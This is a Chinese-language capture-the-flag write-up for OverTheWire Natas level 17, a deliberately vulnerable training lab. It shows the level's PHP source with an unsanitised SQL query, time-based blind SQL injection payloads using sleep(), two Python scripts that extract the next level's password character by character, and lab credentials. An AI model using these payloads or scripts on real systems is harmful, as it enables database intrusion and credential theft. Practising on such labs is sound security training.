OverTheWire攻关过程-Natas模块17

我们打开lv17，查看信息

查看源代码

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas17', '<censored>');
    mysqli_select_db($link, 'natas17');

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
    } else {
        //echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>

发现主要的SQL查询语句

这种sql盲注的语句，参考大神的思路

通过sleep(5)来判断是否执行

SELECT * from users where username="_natas18" and password like binary '%a%' and sleep(5) #

语句为以上注入形式

python脚本代码如下

import requests  
from requests.auth import HTTPBasicAuth  
  
Auth=HTTPBasicAuth('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')  
headers = {'content-type': 'application/x-www-form-urlencoded'}  
filteredchars = ''  
passwd = ''  
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'  
  
for char in allchars:  
        payload = 'username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23'.format(char)  
        r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)  
        if(r.elapsed.seconds >= 1):  
                filteredchars = filteredchars + char  
                print(filteredchars)  
  
print(filteredchars)  
  
for i in range(0,32):  
        for char in filteredchars:  
                payload = 'username=natas18%22%20and%20password%20like%20binary%20\'{0}%25\'%20and%20sleep(1)%23'.format(passwd + char)  
                r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)  
                if(r.elapsed.seconds >= 1):  
                        passwd = passwd + char  
                        print(passwd)  
                        break

我们使用vscode进行计算

python3.10的脚本

# coding:utf-8
import requests
url = 'http://natas17:XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd@natas17.natas.labs.overthewire.org/index.php'
key = ''

for i in range(1, 33):
    a = 32
    c = 126
    while a < c:
        b = int((a + c) / 2)  # 79 O
        payload = r'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(10),1) and "" like "' % (b, i)
        try:
            req = requests.post(url=url, data={"username": payload}, timeout=10)
        except requests.exceptions.Timeout as e:
            a = b + 1  # 80 P
            b = int((a + c) / 2)  # 103 g
            continue
        c = b
    key += chr(b)
    print(key)

不过时间改为10秒钟，耐心等待即可

得出密码

8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq

验证密码